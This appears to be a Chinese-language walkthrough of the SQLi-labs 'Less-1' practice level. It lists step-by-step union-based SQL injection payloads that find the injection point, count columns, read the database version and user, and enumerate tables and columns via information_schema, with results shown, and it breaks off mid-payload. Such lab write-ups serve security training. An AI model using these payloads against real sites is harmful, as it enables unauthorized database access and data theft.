Basic Injection
Less-1 单引号字符型get报错注入
判断注入点
?id=1' and 1=2 -- +
确认字段数量
?id=1' order by 3 -- +
查询用户,版本,当前数据库名
?id=-1' union select 1,version(),database()--+
这里可以将payload拿到mysql去执行看看结果
sql=select * from users where id='-1' union select 1,version(),database()
database=security
verion:5.5.53
?id=-1' union select 1,user(),3--+
user:root@localhost
查询当前数据库所有的表名
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1' union select 1,2,group_concat(table_name)from(information_schema.tables)where(table_schema)like('security')--+
tables:emails,referers,uagents,users
查询敏感表——users
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1' union select 1,2,group_concat(column_name)from(information_sc